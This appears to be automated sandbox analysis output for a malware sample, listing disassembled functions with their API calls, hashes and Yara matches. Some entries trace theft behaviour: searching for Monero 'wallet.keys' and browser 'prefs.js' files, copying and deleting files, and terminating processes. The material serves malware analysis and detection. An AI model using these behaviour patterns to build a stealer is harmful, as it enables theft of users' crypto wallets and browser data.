                                • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                • API String ID: 0-1562099544
                                • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                • Instruction ID: 3dadc6e66ba112c1c793950841c7e168b6a1de68d752997a4921594d83fa2a76
                                • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                • Instruction Fuzzy Hash: 9DE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                Function 00EAF7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EC16B0,00EC0D97), ref: 00EAF81E
                                • StrCmpCA.SHLWAPI(?,00EC16B4), ref: 00EAF86F
                                • StrCmpCA.SHLWAPI(?,00EC16B8), ref: 00EAF885
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00EAFBB1
                                • FindClose.KERNEL32(000000FF), ref: 00EAFBC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: prefs.js
                                • API String ID: 3334442632-3783873740
                                • Opcode ID: 6ddcbefb0910224f164865b77cfcd86cb7c37ae87222be14bf75b01a86d745ad
                                • Instruction ID: 2ed65c430ea24b8e0b4a08b605c98af63804597989f6a44694ba1b457824439c
                                • Opcode Fuzzy Hash: 6ddcbefb0910224f164865b77cfcd86cb7c37ae87222be14bf75b01a86d745ad
                                • Instruction Fuzzy Hash: 0EB12171910118ABCF24FB60DD96FEE73B9AF55300F4455B8E41A7A181EF30AB48CB92
                                Function 00EA1710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EC523C,?,?,?,00EC52E4,?,?,00000000,?,00000000), ref: 00EA1963
                                • StrCmpCA.SHLWAPI(?,00EC538C), ref: 00EA19B3
                                • StrCmpCA.SHLWAPI(?,00EC5434), ref: 00EA19C9
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EA1D80
                                • DeleteFileA.KERNEL32(00000000), ref: 00EA1E0A
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00EA1E60
                                • FindClose.KERNEL32(000000FF), ref: 00EA1E72
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 1415058207-1173974218
                                • Opcode ID: bd89d7ebcb4d205d5a87c6938f1dc49ac1269e8e5822f758704e04baaa18afc9
                                • Instruction ID: c119a093f81ac5130c8913f1e4cfa8202df15531884b5033098a02cf5944f792
                                • Opcode Fuzzy Hash: bd89d7ebcb4d205d5a87c6938f1dc49ac1269e8e5822f758704e04baaa18afc9
                                • Instruction Fuzzy Hash: 9112EC71910118ABCF19EB60CDA6EEFB3B9AF54300F4455F9A11A76091EF306B89CF61
                                Function 00EADF10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00EC0C32), ref: 00EADF5E
                                • StrCmpCA.SHLWAPI(?,00EC15C0), ref: 00EADFAE
                                • StrCmpCA.SHLWAPI(?,00EC15C4), ref: 00EADFC4
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00EAE4E0
                                • FindClose.KERNEL32(000000FF), ref: 00EAE4F2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                • String ID: \*.*
                                • API String ID: 2325840235-1173974218
                                • Opcode ID: 2b191945c6d4c701be5a7126856ca8ab7e11dcb7b0b11498793dbed54adfb515
                                • Instruction ID: bb13f00b105a7b5bc6e29084cfc3cef74043aa9433de5b11e75561081d8c32b1
                                • Opcode Fuzzy Hash: 2b191945c6d4c701be5a7126856ca8ab7e11dcb7b0b11498793dbed54adfb515
                                • Instruction Fuzzy Hash: 32F1BF71924118AACF15FB60DDA6EEFB3B9AF14300F4465F9A01A72191EF306B89CF51
                                Function 00EADB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EC15A8,00EC0BAF), ref: 00EADBEB
                                • StrCmpCA.SHLWAPI(?,00EC15AC), ref: 00EADC33
                                • StrCmpCA.SHLWAPI(?,00EC15B0), ref: 00EADC49
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00EADECC
                                • FindClose.KERNEL32(000000FF), ref: 00EADEDE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                • Opcode ID: 049e945d78d13d62d7a3f69b48d23957813a1c3c541240cffb49898de68ddc12
                                • Instruction ID: 73cd2224e0f773799e2a8a39d3fecd64dfc9eccd2bdd9db2da2c22a247c4dae9
                                • Opcode Fuzzy Hash: 049e945d78d13d62d7a3f69b48d23957813a1c3c541240cffb49898de68ddc12
                                • Instruction Fuzzy Hash: 7D913672A00104ABCF14FB70DD969EE73BD9B89340F4455B8F8177A185EE34AB48CB92
                                Function 00EB98E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00EB9905
                                • Process32First.KERNEL32(00EA9FDE,00000128), ref: 00EB9919
                                • Process32Next.KERNEL32(00EA9FDE,00000128), ref: 00EB992E
                                • StrCmpCA.SHLWAPI(?,00EA9FDE), ref: 00EB9943
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EB995C
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00EB997A
                                • CloseHandle.KERNEL32(00000000), ref: 00EB9987
                                • CloseHandle.KERNEL32(00EA9FDE), ref: 00EB9993
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 2696918072-0
                                • Opcode ID: ca2c4f4024272236877ec3246f46760212ab110abb9cb249a285a82572abe755
                                • Instruction ID: 74c676802ed7c0baac97a3fffd5809275e32a937dd02f259f598b32ea394ecef
                                • Opcode Fuzzy Hash: ca2c4f4024272236877ec3246f46760212ab110abb9cb249a285a82572abe755
                                • Instruction Fuzzy Hash: B1112175900208ABDB64DFA0DC8CBDEB779BB88700F10459CF615A6284D7749B84CF90
                                Function 012F02D6 Relevance: 11.6, Strings: 8, Instructions: 1642COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: \]$!mu$$VE?$7N{_$Rc};$Rt'v$[:ww$hjz9
                                • API String ID: 0-2401617613
                                • Opcode ID: d1bd3b330b5e1a1de3bc4aa695df6dcab746777db785cc33fe180342ea21111c
                                • Instruction ID: 31bd0fbd36ced458b11c3ad2ea7d652fc243d0acab6b9d708c724ac365500393
                                • Opcode Fuzzy Hash: d1bd3b330b5e1a1de3bc4aa695df6dcab746777db785cc33fe180342ea21111c
                                • Instruction Fuzzy Hash: 91B207F36082049FE304AE2DEC8577ABBE9EF94720F1A493DE6C4C7744EA7558018796
                                Function 01302B6C Relevance: 11.6, Strings: 8, Instructions: 1596COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: /"|$63A}$Aoa$K:Z;$NjM$NjM$Rz}$Z7g
                                • API String ID: 0-1292933336
                                • Opcode ID: 4e8b29e1a60500a0fd7fc5e1a693e580de2e39bb4adf61b130adf5cfe2f4b045
                                • Instruction ID: 824fb0960c3f5e837952f7113e61c303f48258f7aeb7a0cd68e7d3982aee80dd
                                • Opcode Fuzzy Hash: 4e8b29e1a60500a0fd7fc5e1a693e580de2e39bb4adf61b130adf5cfe2f4b045
                                • Instruction Fuzzy Hash: 8AB2F5F3A0C2049FE3046E29EC4567AFBE5EF94720F1A493DEAC4C3744EA3598458697
                                Function 00EB7D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                • GetKeyboardLayoutList.USER32(00000000,00000000,00EC05B7), ref: 00EB7D71
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00EB7D89
                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 00EB7D9D
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00EB7DF2
                                • LocalFree.KERNEL32(00000000), ref: 00EB7EB2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: d30c9cdea039e55d1c3babe6f77a83f4989f5925a1b832ed1957c2a05375c8bd
                                • Instruction ID: 991404add7c9c83d717df65f396c0c17a945b24edeaa8a2abbef912638575d48
                                • Opcode Fuzzy Hash: d30c9cdea039e55d1c3babe6f77a83f4989f5925a1b832ed1957c2a05375c8bd
                                • Instruction Fuzzy Hash: 09413C71950218ABCB24DB94DC99BEEB7B8FF44700F2041E9E01A76680DB746F84CFA1
                                Function 012FF714 Relevance: 10.3, Strings: 7, Instructions: 1542COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: _ot$&F_s$&F_s$P3w_$nL=$sLv~$_~
                                • API String ID: 0-653492069
                                • Opcode ID: b50551eb30596f9872ddd4be5ae56880f1a88a8c321eb559b230f23f7430b7dd
                                • Instruction ID: 53a207a1332edfba520f20eae021d296116ad02804277ee0e0e56fe3b1fc65b0
                                • Opcode Fuzzy Hash: b50551eb30596f9872ddd4be5ae56880f1a88a8c321eb559b230f23f7430b7dd
